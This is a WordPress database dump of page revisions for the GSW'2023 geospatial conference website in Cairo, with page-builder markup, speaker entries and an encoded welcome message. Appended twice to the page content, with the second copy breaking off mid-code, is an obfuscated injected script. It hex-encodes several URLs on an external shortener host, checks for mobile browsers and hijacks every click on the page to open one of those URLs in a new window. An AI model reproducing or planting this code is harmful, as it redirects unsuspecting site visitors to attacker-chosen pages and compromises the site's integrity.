tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][dt_icon_text layout=\"layout_1\" dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 12:19:37','2022-10-20 12:19:37','',2167,'https://gsw2023.com/?p=2915',0,'revision','',0),
(2916,1,'2022-10-20 12:19:37','2022-10-20 12:19:37','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][dt_icon_text layout=\"layout_1\" dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 